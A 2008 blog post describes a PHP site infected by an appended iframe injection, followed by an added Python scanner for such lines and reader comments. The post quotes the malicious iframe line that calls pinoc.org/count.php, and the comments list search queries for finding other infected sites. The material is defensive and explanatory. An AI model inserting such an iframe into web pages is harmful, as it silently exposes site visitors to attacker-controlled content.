${log.root}/lowem.log
Inflation, Investing and Everything


Tuesday September 30, 2008

wsxhost.net PHP virus/trojan infection via iframe code injection

One of my domains just got hacked. It must have happened sometime in the past 24 hours because I check on all my domains multiple times per day, and it was just picked up by the corporate firewall.

According to this site:

A lot of popular scripts developed for PHP 4 are currently being hacked through a tmp directory exploit ... it manifests itself in an appended line in index.php (pls check also administrator/index.php), which through an iframe makes a URL query (GET) to a count.php file. External website varies (depends on infected slaves/hosts) but can be picnoc.org, picnoc.info or wsxhost.net. The code line (appended last in above mentioned files) resembles "<iframe src="http://pinoc.org/count.php?o=2" </iframe>"

- It's safe to say that all the .html and .php files are infected (I did a check). As of now, sub-domains are still safe for the moment, they are only infecting the main URL (www.[domain].com, etc).

Seems that there are a lot of PHP hacks going on these days. Just a week ago or so, a popular parenting forum which I am helping out with also got registration-spammed, even through the CAPTCHA - they were using the default PHPBB CAPTCHA though so I'd suppose that has gotten broken and leaks like a sieve by now.

Owners of PHP-based sites beware!

(2008-09-30 18:18:56 SGT) [Tech]
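One way to check a web root for the appended iframe line described in the post, as an added example that is not part of the original post: it walks the .php and .html files, lists every iframe whose src points at a host you do not own, and marks whether the tag sits on the last line of the file. The own_hosts value, the function names and the sample files are assumptions constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Captures the src of an <iframe> tag; tolerates the malformed markup quoted
# in the post (no '>' before </iframe>).
IFRAME_SRC = re.compile(r'<iframe\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
SCAN_SUFFIXES = {".php", ".html", ".htm"}


def external_iframes(text, own_hosts):
    """Return (src, at_tail) for each iframe whose host is not in own_hosts."""
    hits, stripped = [], text.rstrip()
    for m in IFRAME_SRC.finditer(text):
        src = m.group(1)
        host = (urlparse(src).hostname or "").lower()
        if host and host not in own_hosts:
            # The injected line is appended last: no newline follows the tag.
            hits.append((src, "\n" not in stripped[m.start():]))
    return hits


def scan_tree(root, own_hosts):
    """Map relative path -> hits for every .php/.html file under root."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = external_iframes(path.read_text(errors="replace"), own_hosts)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report


def demo():
    """Scan a constructed web root (sample files, not real site content)."""
    injected = '<iframe src="http://pinoc.org/count.php?o=2" </iframe>\n'
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "administrator").mkdir()
        (root / "index.php").write_text("<?php echo 'home'; ?>\n" + injected)
        (root / "administrator" / "index.php").write_text("<?php ?>\n" + injected)
        (root / "about.html").write_text('<iframe src="/map.html"></iframe>\n')
        return scan_tree(root, own_hosts={"www.example.com"})


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

Matching on any off-site iframe host rather than on the three domains named in the quote keeps the check useful when the external site varies, as the quoted description says it does.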

Comments:

Maybe you can use this information to solve it.
http://forum.joomla.org/viewtopic.php?f=432&t=329768&p=1432932

Posted by Marco on September 30, 2008 at 08:37 PM SGT #

You're not alone. As of 9:56am Central Time (Chicago - home of the Cubs AND Sox)

Google search shows 96 other sites via: intext:pinoc.org/count.php

3 other sites via:
intext:pinoc.info/count.php

and 199 pages via:
intext:"count.php?o=2"

Many exploits out there. Just curious, how do you check your website? Browser? Or do you actually look at the code (View Source)?

Posted by Tom Raef on September 30, 2008 at 11:02 PM SGT #

Joomla has been affected.
What's the best way to protect?

Posted by Juan on October 04, 2008 at 05:47 AM SGT #
